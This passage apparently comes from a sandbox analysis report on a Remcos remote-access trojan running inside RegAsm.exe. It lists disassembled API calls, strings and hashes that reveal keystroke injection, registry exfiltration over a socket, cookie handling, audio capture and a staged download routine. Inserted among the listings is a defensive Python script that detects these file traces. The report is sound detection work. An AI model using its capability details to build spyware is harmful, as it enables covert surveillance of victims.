                          • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                          • Opcode Fuzzy Hash: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                          • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
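The block directly above (CreateFileW, WriteFile, CloseHandle, MoveFileW, DeleteFileW with the string ".part") and the two waveIn* blocks earlier in this listing (CreateDirectoryW, waveInOpen/PrepareHeader/AddBuffer/Start, then _strftime with "%Y-%m-%d %H.%M" and ".wav") each leave a recognisable trace on disk. The Python below is an added detection example, not code from the Joe Sandbox report or from Remcos: it walks a stream of file events and flags a ".part" file renamed to its final name by the same process, a ".part" file that is deleted instead (assumed here to be the DeleteFileW cleanup path; the listing does not show the branch condition), and timestamped ".wav" files matching the strftime pattern. The FileEvent record shape and the sample events are constructed for the example; real telemetry such as Sysmon file-create and rename events has its own field names. Browsers write ".part" files legitimately, so severity is raised only when the writing process is one that should not be writing downloads or recordings; the only such host the report supports is RegAsm.exe, the process this memory dump was taken from.

```python
"""Added example: flag the on-disk traces implied by the RegAsm.exe function
listings above (".part" download-then-rename and timestamped ".wav" audio
captures). Not code from the Joe Sandbox report or from Remcos."""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Iterable

PART_SUFFIX = ".part"
# strftime("%Y-%m-%d %H.%M") + ".wav": the file names the waveIn* block builds
WAV_CAPTURE = re.compile(r"^\d{4}-\d{2}-\d{2} \d{2}\.\d{2}\.wav$")
# Processes that have no business writing downloads or recordings. The report's
# dump came from RegAsm.exe; extend this set per environment (assumption).
SUSPECT_HOSTS = {"regasm.exe"}


@dataclass(frozen=True)
class FileEvent:
    """Constructed, simplified file event; real telemetry has its own fields."""
    pid: int
    image: str                   # image path of the writing process
    op: str                      # "create", "rename" or "delete"
    path: str
    new_path: str | None = None  # rename target, for op == "rename"


@dataclass(frozen=True)
class Finding:
    pid: int
    image: str
    rule: str
    severity: str
    detail: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1]


def severity_for(image: str) -> str:
    return "high" if basename(image).lower() in SUSPECT_HOSTS else "info"


def scan_file_events(events: Iterable[FileEvent]) -> list[Finding]:
    """Correlate per (pid, path): a .part create must be followed by a rename to
    the same name minus the suffix (MoveFileW) or by a delete (DeleteFileW)."""
    pending: dict[tuple[int, str], FileEvent] = {}
    wavs: dict[tuple[int, str], list[str]] = {}
    findings: list[Finding] = []

    for ev in events:
        name = basename(ev.path)
        key = (ev.pid, ev.path.lower())
        if ev.op == "create" and name.lower().endswith(PART_SUFFIX):
            pending[key] = ev
        elif ev.op == "rename" and ev.new_path is not None and key in pending:
            if ev.path.lower() == ev.new_path.lower() + PART_SUFFIX:
                pending.pop(key)
                findings.append(Finding(ev.pid, ev.image, "part-download-rename",
                                        severity_for(ev.image),
                                        f"{ev.path} -> {ev.new_path}"))
        elif ev.op == "delete" and key in pending:
            pending.pop(key)
            findings.append(Finding(ev.pid, ev.image, "part-download-aborted",
                                    "info", ev.path))
        elif ev.op == "create" and WAV_CAPTURE.match(name):
            wavs.setdefault((ev.pid, ev.image), []).append(ev.path)

    # One finding per recording process, however many captures it wrote.
    for (pid, image), paths in wavs.items():
        findings.append(Finding(pid, image, "timestamped-wav-capture",
                                severity_for(image),
                                f"{len(paths)} file(s), first {paths[0]}"))
    return findings


def sample_events() -> list[FileEvent]:
    """Constructed events: an injected RegAsm.exe (pid 9, matching the report's
    dump naming) next to a browser doing the same .part dance legitimately."""
    regasm = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    chrome = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
    tmp = r"C:\Users\u\AppData\Local\Temp"
    dl = r"C:\Users\u\Downloads"
    rec = r"C:\Users\u\AppData\Roaming\MicRecords"
    return [
        FileEvent(9, regasm, "create", tmp + r"\update.bin.part"),
        FileEvent(9, regasm, "rename", tmp + r"\update.bin.part", tmp + r"\update.bin"),
        FileEvent(9, regasm, "create", rec + r"\2024-09-26 14.05.wav"),
        FileEvent(4321, chrome, "create", dl + r"\report.pdf.part"),
        FileEvent(4321, chrome, "rename", dl + r"\report.pdf.part", dl + r"\report.pdf"),
        FileEvent(9, regasm, "create", rec + r"\2024-09-26 14.10.wav"),
        FileEvent(4321, chrome, "create", dl + r"\big.iso.part"),
        FileEvent(4321, chrome, "delete", dl + r"\big.iso.part"),
        FileEvent(9, regasm, "create", tmp + r"\notes.txt"),
    ]


if __name__ == "__main__":
    for f in scan_file_events(sample_events()):
        print(f"[{f.severity}] pid={f.pid} {f.rule}: {f.detail} ({basename(f.image)})")
```

Run stand-alone it prints four findings: the RegAsm.exe rename and its two recordings at "high", the browser's rename and aborted download at "info". The ".part" rule on its own is noise; the pairing with the writing process is what makes it useful, and the same per-process correlation is how the timestamped ".wav" rule avoids firing on an audio editor that happens to use date-stamped names.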
                          APIs
                          • AllocConsole.KERNEL32 ref: 0041CE35
                          • GetConsoleWindow.KERNEL32 ref: 0041CE3B
                          • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                          • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Console$Window$AllocOutputShow
                          • String ID: Remcos v$5.1.2 Pro$CONOUT$
                          • API String ID: 4067487056-1584637518
                          • Opcode ID: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                          • Instruction ID: 6efa3de70d430de9448838496adf33c47162c0890a3ad1875f095e209401f165
                          • Opcode Fuzzy Hash: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                          • Instruction Fuzzy Hash: A90144B1A80304BBD610F7F19C8BF9E77AC9B14B05F500527BA04A70D2EB6DD944466E
                          APIs
                          • SendInput.USER32 ref: 00419A25
                          • SendInput.USER32(00000001,?,0000001C), ref: 00419A4D
                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                          • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                            • Part of subcall function 004199CE: MapVirtualKeyA.USER32 ref: 004199D4
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: InputSend$Virtual
                          • String ID:
                          • API String ID: 1167301434-0
                          • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                          • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                          • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                          • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: __freea$__alloca_probe_16_free
                          • String ID: a/p$am/pm$h{D
                          • API String ID: 2936374016-2303565833
                          • Opcode ID: fd6751c856b69d551333f65899c140b2c90fb7d01a30c867c2f4d7dd71cdc8bb
                          • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                          • Opcode Fuzzy Hash: fd6751c856b69d551333f65899c140b2c90fb7d01a30c867c2f4d7dd71cdc8bb
                          • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                          APIs
                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                          • _free.LIBCMT ref: 00444E87
                          • _free.LIBCMT ref: 00444E9E
                          • _free.LIBCMT ref: 00444EBD
                          • _free.LIBCMT ref: 00444ED8
                          • _free.LIBCMT ref: 00444EEF
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$AllocateHeap
                          • String ID: KED
                          • API String ID: 3033488037-2133951994
                          • Opcode ID: bf8f09c86d4ddf62a61791e98d41f8d125843f3e4b01e4d539fef815b17f4b11
                          • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                          • Opcode Fuzzy Hash: bf8f09c86d4ddf62a61791e98d41f8d125843f3e4b01e4d539fef815b17f4b11
                          • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                          APIs
                          • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                          • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710), ref: 00413BC6
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Enum$InfoQueryValue
                          • String ID: [regsplt]$xUG$TG
                          • API String ID: 3554306468-1165877943
                          • Opcode ID: 4b0e642b2c48494caa08e7f7a3ba59522f0f548a4503128eeb0998b2f931d829
                          • Instruction ID: 25111a67c66830bda9a991cbd11294aa9b1843c944dfd5f4caafe5fa1545c2ae
                          • Opcode Fuzzy Hash: 4b0e642b2c48494caa08e7f7a3ba59522f0f548a4503128eeb0998b2f931d829
                          • Instruction Fuzzy Hash: 05512D71900219AADB11EB95DC86EEEB77DAF04305F10007AE505B6191EF746B48CBA9
                          APIs
                          • GetConsoleCP.KERNEL32 ref: 100094D4
                          • __fassign.LIBCMT ref: 1000954F
                          • __fassign.LIBCMT ref: 1000956A
                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                          • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000), ref: 100095AF
                          • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000), ref: 100095E8
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                          • String ID:
                          • API String ID: 1324828854-0
                          • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                          • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                          • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                          • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                          APIs
                          • GetConsoleCP.KERNEL32 ref: 0044B47E
                          • __fassign.LIBCMT ref: 0044B4F9
                          • __fassign.LIBCMT ref: 0044B514
                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                          • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000), ref: 0044B559
                          • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000), ref: 0044B592
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                          • String ID:
                          • API String ID: 1324828854-0
                          • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                          • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                          • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                          • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                          APIs
                          • RegOpenKeyExW.ADVAPI32 ref: 00413D81
                            • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                            • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                          • RegCloseKey.ADVAPI32(00000000), ref: 00413EEF
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseEnumInfoOpenQuerysend
                          • String ID: xUG$NG$NG$TG
                          • API String ID: 3114080316-2811732169
                          • Opcode ID: b671a3d148dc4dad6e50aea19cc29b45d172fff4de9eef1f9094f07207dc39cd
                          • Instruction ID: 39136fa66a1b3d14a29046baa0c8a2124f92290552efa608aac098e6c3039c27
                          • Opcode Fuzzy Hash: b671a3d148dc4dad6e50aea19cc29b45d172fff4de9eef1f9094f07207dc39cd
                          • Instruction Fuzzy Hash: 03419F316042005AC324F726D852AEF76A99FD1384F40883FF549671D2EF7C5949866E
                          APIs
                          • _ValidateLocalCookies.LIBCMT ref: 1000339B
                          • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                          • _ValidateLocalCookies.LIBCMT ref: 10003431
                          • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                          • _ValidateLocalCookies.LIBCMT ref: 100034B1
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                          • String ID: csm
                          • API String ID: 1170836740-1018135373
                          • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                          • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                          • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                          • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                          APIs
                            • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32 ref: 00413678
                            • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                            • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                            • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                            • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                          • _wcslen.LIBCMT ref: 0041B7F4
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                          • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                          • API String ID: 3286818993-122982132
                          • Opcode ID: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                          • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                          • Opcode Fuzzy Hash: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                          • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                          APIs
                            • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                            • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
                            • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                          • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                          • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                          • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                          • API String ID: 1133728706-4073444585
                          • Opcode ID: c07787becfdd919c069db1a68e32e5c9d5958318cedaa5e6beefbf099ad8eae3
                          • Instruction ID: a06d8339010b4a31413dea3cf8b7af81beee50618fccc2c871009a62ab4f9f33
                          • Opcode Fuzzy Hash: c07787becfdd919c069db1a68e32e5c9d5958318cedaa5e6beefbf099ad8eae3
                          • Instruction Fuzzy Hash: BC215230A40219A6CB14F7F1CC969EE77299F50744F80017FE502B71D1EB7D6945C6DA
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4464324db8c5353dfe5ce51150f621231adbafcb5ed67c6bb2f14fac2072150c
                          • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                          • Opcode Fuzzy Hash: 4464324db8c5353dfe5ce51150f621231adbafcb5ed67c6bb2f14fac2072150c
                          • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                          APIs
                          • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C4DE
                          • CloseHandle.KERNEL32(00000000), ref: 0041C4EA
                          • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4FB
                          • CloseHandle.KERNEL32(00000000), ref: 0041C508
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseHandle$CreatePointerWrite
                          • String ID: xpF
                          • API String ID: 1852769593-354647465
                          • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                          • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                          • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                          • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639
                          APIs
                            • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                          • _free.LIBCMT ref: 100092AB
                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                          • _free.LIBCMT ref: 100092B6
                          • _free.LIBCMT ref: 100092C1
                          • _free.LIBCMT ref: 10009315
                          • _free.LIBCMT ref: 10009320
                          • _free.LIBCMT ref: 1000932B
                          • _free.LIBCMT ref: 10009336
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                          • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                          • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                          • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                          APIs
                            • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                          • _free.LIBCMT ref: 00450FC8
                            • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                          • _free.LIBCMT ref: 00450FD3
                          • _free.LIBCMT ref: 00450FDE
                          • _free.LIBCMT ref: 00451032
                          • _free.LIBCMT ref: 0045103D
                          • _free.LIBCMT ref: 00451048
                          • _free.LIBCMT ref: 00451053
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                          • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                          • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                          • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                          APIs
                          • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                          • int.LIBCPMT ref: 004111BE
                            • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                            • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                          • std::_Facet_Register.LIBCPMT ref: 004111FE
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                          • String ID: (mG
                          • API String ID: 2536120697-4059303827
                          • Opcode ID: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                          • Instruction ID: b4facbf35e110c19f3eede998f69f9310dce987b63f856d60fe44c7d5fb17b17
                          • Opcode Fuzzy Hash: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                          • Instruction Fuzzy Hash: 42112732900114A7CB14EB9AD8018DEB7699F44364F11456FF904F72E1DB789E45CBC8
                          APIs
                          • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                          • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLastValue___vcrt_
                          • String ID:
                          • API String ID: 3852720340-0
                          • Opcode ID: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                          • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
